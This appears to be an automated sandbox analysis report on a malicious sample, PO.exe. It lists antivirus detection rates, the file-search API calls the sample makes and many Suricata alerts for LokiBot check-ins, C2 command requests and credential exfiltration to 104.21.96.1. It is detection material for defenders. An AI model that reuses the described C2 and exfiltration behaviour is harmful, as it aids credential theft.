Multi AV Scanner detection for submitted file

Source: PO.exe	ReversingLabs: Detection: 31%
Source: PO.exe	Virustotal: Detection: 34%			Perma Link

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: PO.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: wntdll.pdbUGP source: PO.exe, 00000000.00000003.2075601379.0000000003AD0000.00000004.00001000.00020000.00000000.sdmp, PO.exe, 00000000.00000003.2074553157.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: PO.exe, 00000000.00000003.2075601379.0000000003AD0000.00000004.00001000.00020000.00000000.sdmp, PO.exe, 00000000.00000003.2074553157.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: svchost.exe, svchost.exe, 00000002.00000002.3314409052.0000000000301000.00000020.00000001.01000000.00000005.sdmp
Source:	Binary string: svchost.pdbUGP source: svchost.exe, 00000002.00000002.3314409052.0000000000301000.00000020.00000001.01000000.00000005.sdmp

Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_009F445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_009F445A
Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_009FC6D1 FindFirstFileW,FindClose,	0_2_009FC6D1
Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_009FC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_009FC75C
Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_009FEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_009FEF95
Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_009FF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_009FF0F2
Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_009FF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_009FF3F3
Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_009F37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_009F37EF
Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_009F3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_009F3B12
Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_009FBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_009FBCBC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,	2_2_00403D74

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49706 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49733 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49706 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49733 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49707 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49707 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49764 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49764 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49704 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49764 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49733 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49707 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49710 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49710 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49710 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49709 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49705 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49705 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49705 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49733 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49710 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49764 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49704 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49707 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.5:49705 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49803 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49706 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49718 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49718 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49845 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49845 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49845 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49709 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49845 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49704 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49718 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49858 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49858 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49858 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49706 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49858 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.5:49704 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49709 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49709 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.96.1:80 -> 192.168.2.5:49710
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49803 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49885 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49885 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49803 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49885 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49718 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49885 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49818 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49818 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49818 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49926 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49803 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49926 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49926 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49818 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.96.1:80 -> 192.168.2.5:49707
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49926 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49872 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49872 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49872 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49750 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49750 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49872 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49750 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49708 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49708 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49708 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49899 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49830 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49899 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49992 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49992 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49708 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49899 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49750 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49899 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50008 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50008 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50008 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50007 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50007 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49992 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50007 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.96.1:80 -> 192.168.2.5:49764
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50012 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50012 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50012 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49992 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50023 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50009 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50023 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50009 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50023 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50009 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50012 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.96.1:80 -> 192.168.2.5:49706
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50019 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50019 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50019 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49830 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.96.1:80 -> 192.168.2.5:49885
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50019 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49830 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50015 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50031 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50031 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50029 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50029 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50023 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50015 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50031 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50015 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.96.1:80 -> 192.168.2.5:49803
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50026 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50026 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50026 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50029 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50007 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50026 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49775 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49791 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49791 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.96.1:80 -> 192.168.2.5:49750
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49791 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50024 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50009 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50008 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50014 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49791 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50015 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50014 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.96.1:80 -> 192.168.2.5:49709
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49775 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50014 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49775 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49937 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50028 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50028 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50028 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49953 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49953 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50035 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49937 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50035 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49775 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49830 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50014 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50013 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50013 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50013 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.96.1:80 -> 192.168.2.5:50007
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50013 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50024 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50035 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50036 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49937 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50036 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50042 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49937 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50031 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50022 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50022 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50022 -> 104.21.96.1:80
